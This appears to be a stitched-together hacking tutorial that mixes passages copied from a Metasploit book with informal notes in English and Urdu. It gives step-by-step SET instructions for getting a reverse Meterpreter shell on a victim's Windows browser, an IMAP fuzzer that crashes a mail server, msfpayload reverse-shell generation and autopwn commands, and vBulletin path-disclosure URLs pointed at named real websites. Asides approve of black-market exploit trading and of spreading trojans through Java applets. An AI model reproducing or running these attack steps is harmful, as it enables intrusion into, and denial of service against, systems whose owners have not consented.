Learn Basic BackTrack Easy Way
Learn Basic BackTrack Easy Way |
METASPLOIT:
Working on MS:* Getting MS
* Using MS Console to launch Exploits
* Using MS to Exploit client-side vulnerabilities
* Using MS MeterPreter
* Using MS as a Man-in-the-Middle password Stealer
* Using MS to Auto-Attack
* Inside MS Exploit Module
Why Metasploit?
Metasploit isn’t just a tool; it’s an entire framework that provides the infrastructure needed to automate mundane, routine, and complex tasks. This allows you to concentrate on the unique or specialized aspects of penetration testing and on identifying flaws within your information security program. As you progress through the chapters in this book and establish a wellrounded methodology, you will begin to see the many ways in which Metasploit can be used in your penetration tests. Metasploit allows you to easily build attack vectors to augment its exploits, payloads, encoders, and more in order to create and execute more advanced attacks. At various points in this book we explain several third-party tools—including some written by the authors of this book—that build on the Metasploit Framework. Our goal is to get you comfortable with the Framework, show you some advanced attacks, and ensure that you can apply these techniques responsibly. We hope you enjoy reading this book as much as we enjoyed creating it. Let the fun and
games begin.
BackTrack Safety Tips & Tricks:
Sniffing & Spoffing are opposite to each other, they canbe helpful when you are trying to get ROOT personaly, i like 'Man in the Middle'.
GUI Bruiteforce; There are patches just update your drivers, because lots of credit cards have been hacked & saled to Russian Black Market in few Dollars. :)
After Vbullitin SQLI Vulnerability another exploit is moving around in black market, there are also some explits of whm and cpanel UgNazi, Don't disclose their real exploit of whm and mybb plesk 8 is also vulnerable.
Packet Sniffing is all about stealing packets same like 'This Man in the Middle' is just an advance form i thinks it have scope only locally as you know every thing go through channel (Medium) same for password BT its take too much time cookies stealing session is also good option if you know what i mean STMP server junk file emails tmp files mis configurance writeable access tasks... :)
Hacking Windows through BackTrack-5-R3.
Open SET (Socialing Toolkit)
Type: 2 (hit enter)
Type: 2 (hit enter)
now choose web templetes , now choose google
Now choose metasploit browser pwn (25)
Now choose windows shell revert tcp meterpreter (2)
Now write port no. 444
Now wait until server is started
jb local ip ka link target open karta hai to agar us k browser ka version old hai. phir scripts auto execute ho jaein gi. target k sys pe notepad.exe name ki file start hoge jo k srf porcess menager pay daikha ja sakta hy
ab aap session -l type ker jis say aap k targets ki list aa jaye ge, ab session -i (desire target's id no.) likhe like sessions -i 1 congrates you have got access...
MetaSploit Basics:
Terminology:
Exploit
Payload
ShellCode
Module
Listener
Metasploit Interfaces:
MSFconsole
MSFcli
Armitage
Metasploit Utilities:
MSFpayload
MSFencode
Nasm Shell
Metasploit Express and Metasploit Pro
Wrapping Up
Terminology
Throughout this book, we’ll use various terms that first bear some explana-tion. The majority of the following basic terms are defined in the context of Metasploit, but they are generally the same throughout the security industry.
Exploit
An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities (such as SQL injection), and con- figuration errors.
Payload
A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Win-dows command prompt (see Chapter 5), whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which
the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
Shellcode:
Shellcode is a set of instructions used as a payload when exploitation occurs.
Shellcode is typically written in assembly language. In most cases, a command shell or a Meterpreter shell will be provided after the series of instructions have been performed by the target machine, hence the name.
Module
A module in the context of this book is a piece of software that can be used by the Metasploit Framework. At times, you may require the use of an exploit
module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes the Framework so powerful.
Listener
A listener is a component within Metasploit that waits for an incoming connection of some sort. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connec-tion, waiting on the attacking machine to be contacted by the exploited system.
Metasploit Interfaces:
Metasploit offers more than one interface to its underlying functionality, including console, command line, and graphical interfaces. In addition to these interfaces, utilities provide direct access to functions that are normally internal to the Metasploit Framework. These utilities can be invaluable for exploit development and situations for which you do not need the flexibility of the entire Framework.
MSFconsole:
Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and wellsupported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams. You can use msfconsole
to do everything, including launching an exploit, loading auxiliary modules, performing enumeration, creating listeners, or running mass exploitation against an entire network.Although the Metasploit Framework is constantly changing, a subset of
commands remain relatively constant. By mastering the basics of msfconsole, you will be able to keep up with any changes. To illustrate the importance of learning msfconsole, it will be used in nearly every chapter of the book.
Starting MSFconsole:
To launch msfconsole, enter msfconsole at the command line:
root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework/msf3# msfconsole
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
msf >
To access msfconsole’s help files, enter help followed by the command which you are interested in. In the next example, we are looking for help for the command connect, which allows us to communicate with a host. The resulting documentation lists usage, a description of the tool, and the various option flags.
msf > help connect
We’ll explore MSFConsole in greater depth in the chapters that follow.
MSFcli
Msfcli and msfconsole take very different approaches to providing access to the Framework. Where msfconsole provides an interactive way to access all features in a user-friendly manner, msfcli puts the priority on scripting and interpret ability with other console-based tools. Instead of providing a unique interpreter to the Framework, msfcli runs directly from the command line, which allows you to redirect output from other tools into msfcli and direct msfcli output to other command-line tools. Msfcli also supports the launching of exploits and auxiliary modules, and it can be convenient when testing modules or developing new exploits for the Framework. It is a fantastic tool for unique exploitation when you know exactly which exploit and options you need. It is less forgiving than msfconsole, but it offers some basic help (including usage and a list of modes) with the command msfcli -h, as shown here:
root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
Mode Description
---- ---------------
(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
root@bt:/opt/framework3/msf3#
CREATING YOUR OWN EXPLOITS:
As a penetration tester, you will frequently encounter applications for which no Metasploit modules are available. In such situations, you can attempt to uncover
vulnerabilities in the application and develop your own exploits for them.
The Art of Fuzzing:
Before you develop any exploit, you need to determine whether a vulnerability exists in the application. This is where fuzzing comes into play. The following listing shows the code for a simple Internet Message Access Protocol (IMAP) fuzzer. Save this to your /root/.msf3/modules/auxiliary/fuzzers/ directory, but be sure to keep your testing modules in a folder separate from the main Metasploit trunk.
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Xinclude Msf::Exploit::Remote::Imap
Yinclude Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Simple IMAP Fuzzer',
'Description' => %q{
An example of how to build a simple IMAP fuzzer.
Account IMAP credentials are required in this
fuzzer.},
'Author' => [ 'ryujin' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $'
)
end
def fuzz_str()
Zreturn Rex::Text.rand_text_alphanumeric(rand(1024))
end
def run()
srand(0)
while (true)
[connected = connect_login()
if not connected
print_status("Host is not responding - this is G00D ;)")
break
end
print_status("Generating fuzzed data...")
\fuzzed = fuzz_str()
print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
]req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"
print_status(req)
res = raw_send_recv(req)
if !res.nil?
print_status(res)
else
print_status("Server crashed, no response")
break
end
disconnect()
end
end
end
------------------------------------------------------------------------------------------------------------
The fuzzer module begins by importing the IMAP X and denial-of-service Y mixins. Including IMAP gives you the required login functionality, and since the goal of the fuzzer is to crash the server, this module results in a denial of service.At Z the fuzz string (the malformed data we want to send) is set as a randomized string of alphanumeric characters with a maximum length of 1024 bytes. The fuzzer connects and logs into the remote service at [, and if it fails to connect and the loop breaks, you have something worth investigating. The lack of response by the server might mean that you’ve successfully caused an exception in the remote service.
At \ the variable fuzzed is set to the random string generated by the Framework, and the malicious request ] is built according to the published exploit code by appending the malicious data to the vulnerable LIST command. If the fuzzer doesn’t receive a response from the server, it prints the message "Server crashed, no response" and quits. To test your new fuzzer, start up msfconsole, load the module, and set its options as follows:
msf > use auxiliary/fuzzers/imap_fuzz
msf auxiliary(imap_fuzz) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
IMAPPASS no The password for the specified username
IMAPUSER no The username to authenticate as
RHOST yes The target address
RPORT 143 yes The target port
msf auxiliary(imap_fuzz) > set IMAPPASS test
IMAPPASS => test
msf auxiliary(imap_fuzz) > set IMAPUSER test
IMAPUSER => test
msf auxiliary(imap_fuzz) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf auxiliary(imap_fuzz) >
The fuzzer should now be ready to go. Make sure that your debugger of choice (we’re using the Immunity Debugger in our examples) is attached to the surgemail.exe process, and start the fuzzer:
msf auxiliary(imap_fuzz) > run
X [*] Authenticating as test with password test...
[*] Generating fuzzed data...
Y [*] Sending fuzzed data, buffer length = 684
Z [*] 0002 LIST () "/v1AD7DnJTVykXGYYM6BmnXuYRlZNIJUzQzFPvASjYxzdTT
RPEpq6f4BBnp5jm3LuSbAOj1M5qULEGEv0DMk0oOPUj6XPN1VwxFpjAfFeAx
DSujURybOp6BkKWroLCzQg2AmTuqz48oNeY9CDeirNwoITfIaC40Ds9OgEDt
75GVfNH4YPpSo2PLmvd5Bf2sY9YDSvDqMmjW9FXrgLoUK2rl9cvoCbTZX1zu
siiYhFokALiF1QI9BRwj4bo0kwZDn8jyedxhSRdU9CFlMs19CvbVnnLWeRGH
Y0DzI4bd7uXgTIHXN6R403ALckZgqOWcUSEWj6THI9NFAIPP1LEnctaK0uxb
8j6xqJsN5GmnIN4HQ4W4PZIjGRHUZC8Q4ytXYEksxXe2ZUhl5Xbdhz13zW2H
rfUGJ8bvjTMSxKihrDMk6BxAnY6kjFGDi5o8hcEag4tzJ1FhH9eI2UHDVbsD
i7XgTaOgzGh" "PWNED"
[ [*] 0002 OK LIST completed
. . . SNIP . . .
[*] Authenticating as test with password test...
[*] Generating fuzzed data...
[*] Sending fuzzed data, buffer length = 1007
[*] 0002 LIST () "/FzwJjIcL16vW4PXDPpJbpsHB4p7Xts9fbaJYjRJASXRqbZnOMzprZfVZH7BYvcHuwlN0Yq
yfoCrJyobzOqoscJeTeRgrDQKA8MDDLbmY6WCQ6XQH9Wkj4c9JCfPjIqTndsocWBz1xLMX1VdsutJEtnceHvhl
Gqee6Djh7v3oJW4tXJMMxe8uR2NgBlKoCbH18VTR8GUFqWCmQ0970B3gR9foi6inKdWdcE6ivbOHElAiYkFYzZ
06Q5dvza58DVhn8sqSnRAmq1UlcUGuvr6r99POlrZst10r606J2B03TBGDFuy0dNMI0EUANKZ6OnCn3Zk1JL65
9MC8PZy0frCiPBqZ4xn0biAjFTH5LsCjIFuI5eZ9LsdXdek7iiOhEmW6D86mAtyg9S1a7RALrbRcLIHJpwMsEE
5LS1wIV9aFPS6RQwI4DtF4bGSle1FCyf63hy3Vo8AKkId6yu5MfjwfUExandVeUldk8c5bhlyqoDp3UX2ClQPZ
os0KpFoIcxmq8R0E3Ri54l5Yl3OPcN7U20Kb1CEAfbhxGFgh1oMzjJpuM7IbHMrZNjVADz6A0byzgiP2pXa7Zm
OloV9u6Fwa0l6sR6oL0Png9MYNwTMXTUdiE7rOjuOmkdgglPTkZ3n4de1FEaLh8Xhf9SNSPZUX0M7gmUiyNYv6
qti3Omy8qvjJOQui1IhUhf5fKOunKIcB5Zw7quznxV1GF2R5hXVTw1vlbMi5TQW68ZDFlD6q6BJ4S3oNrFCyXX
aQpAURyCoDGdjoxk1vrUPGusf3i4EIF2iqyyekWiQ7GuYcwMax3o0ZXB2djFh2dYEGyBSCHaFhpwUgamThinnM
AsDFuEY9Hq9UOQSmZ6ySunifPFjCbDs4Zooquw0HPaVnbNVo97tfVBYSei9dWCUWwUAPVJVsTGoDNRVarOrg8q
wbziv8aQaPZ7Y8r0SUiB1nNhlhl3UCVZpf8Gck0psjETf4ks356q0I3mLZkqCLkznVV4ayetVgaDm" "PWNED"
\ [*] Server crashed, no response
[*] Auxiliary module execution completed
msf auxiliary(imap_fuzz) >
-------------------------------------------------------------------------
In this listing, the fuzzer connects and logs into the remote service at X and generates a random string of text at Y. At Z the malicious request is sent to the server, and the reply is received and displayed at [. If the server receives no reply, you receive the notification at \ that the server has crashed, which is your cue to check your debugger. If you now check your debugger on the Windows target, you should see that it has paused at the point of the crash, as shown in Figure 14-1. Looking at the crash, we can see that no memory addresses are overwritten and that, unfortunately, there’s nothing really exploitable at first glance. After further tinkering with increasing buffer lengths, you will find that by sending an even longer string of 11,000 bytes, you can overwrite the Structured Exception Handler (SEH). Controlling the SEH makes the exploit more reliable, because it makes it more versatile. Similarly, the use of an application DLL for a return address makes the exploit portable across different operating system versions.
To send the 11,000-byte string, we make a small change in the fuzzer code, as shown here:
--------------------------------------------------------------------------------------------
print_status("Generating fuzzed data...")
fuzzed = "A" * 11000
print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"
----------------------------------------------------------------------------------------------
Rather than using the random string of characters, this code modification sends a string of 11,000 As as part of the malicious request.
CHEAT SHEET
Here is a reference for the most frequently used com-
mands and syntax within Metasploit’s various interfaces
and utilities. See “Meterpreter Post Exploitation Com-
mands” on page 282 for some all-in-one commands
that will make your life easier.
MSFconsole Commands
show exploits
Show all exploits within the Framework.
show payloads
Show all payloads within the Framework.
show auxiliary
Show all auxiliary modules within the Framework.
search name
Search for exploits or modules within the Framework.
info
Load information about a specific exploit or module.
use name
Load an exploit or module (example: use windows/smb/psexec).
LHOST
Your local host’s IP address reachable by the target, often the public IP
address when not on a local network. Typically used for reverse shells.
RHOST
The remote host or the target.
set function
Set a specific value (for example, LHOST or RHOST).
setg function
Set a specific value globally (for example, LHOST or RHOST).
show options
Show the options available for a module or exploit.
show targets
Show the platforms supported by the exploit.
set target num
Specify a specific target index if you know the OS and service pack.
set payload payload
Specify the payload to use.
show advanced
Show advanced options.
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.
check
Determine whether a target is vulnerable to an attack.
exploit
Execute the module or exploit and attack the target.
exploit -j
Run the exploit under the context of the job. (This will run the exploit
in the background.)
exploit -z
Do not interact with the session after successful exploitation.
exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
exploit -h
Display help for the exploit command.
sessions -l
List available sessions (used when handling multiple shells).
sessions -l -v
List all available sessions and show verbose fields, such as which vulnera-
bility was used when exploiting the system.
sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.
sessions -K
Kill all live sessions.
sessions -c cmd
Execute a command on all live Meterpreter sessions.
sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.
db_create name
Create a database to use with database-driven attacks (example: db_create
autopwn).
db_connect name
Create and connect to a database for driven attacks (example: db_connect
autopwn).
db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported,
such as –sT –v –P0.)
db_autopwn -h
Display help for using db_autopwn.
db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.
db_destroy
Delete the current database.
db_destroy user:password@host:port/database
Delete database using advanced options.
MSFpayload Commands
msfpayload -h
List available payloads.
msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (these can use any payload).
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X
payload.exe
Create a Meterpreter reverse_tcp payload to connect back to 192.168 and on port 443, and then save it as a Windows Portable Executabl named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R
payload.raw
Same as above, but export as raw format. This will be used later in msfencode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.
JAVA Exploits:
To Java applet, javascript ke aesi application ho sakti hai jo kisi bhi specified purpose keliye web mei upload kartay hain. Java applet aik javascript hoti hai jo ham apni web me upload kartay hain, is ki waja say ham koi bhi apna virus, trojan ya kisi botnet ka server web k through easily spread kar saktay hain, ye aam tor pay illagal hota hy. java applet animation, 3d image aor nasa world wind me bhi use hota hy.
Personaly i don't like disclosure vulnerability but they can helpful in brutforcing via hydra or cpanel even mysql, ftp, SSH as they disclose your username. java exploit was one of the biggest exploit normaly work when anyone have installed java tool kit on browser basicaly a remote exploit.
Vbulletin 4.2.0 full path disclousre in forumrunner:
http://<yourweblink>/forumrunner/include/album.php
e.g:
http://forum.hackerbrail.com.br/forumrunner/include/album.php
http://sevenskins.com/forumrunner/include/album.php
Man-Left-in-the-Middle
A man-left-in-the-middle attack uses HTTP referers on an already compromised site or a cross-site scripting (XSS) vulnerability to pass the target’s credentials back to the HTTP server. If you find an XSS vulnerability and send the URL to the target, who then clicks the link, the website will operate normally, but when the target logs into the system, his credentials are passed to the attacker. The man-left-in-the-middle attack vector can be accessed through SET’s web attack vector interface.
thanks for Feedback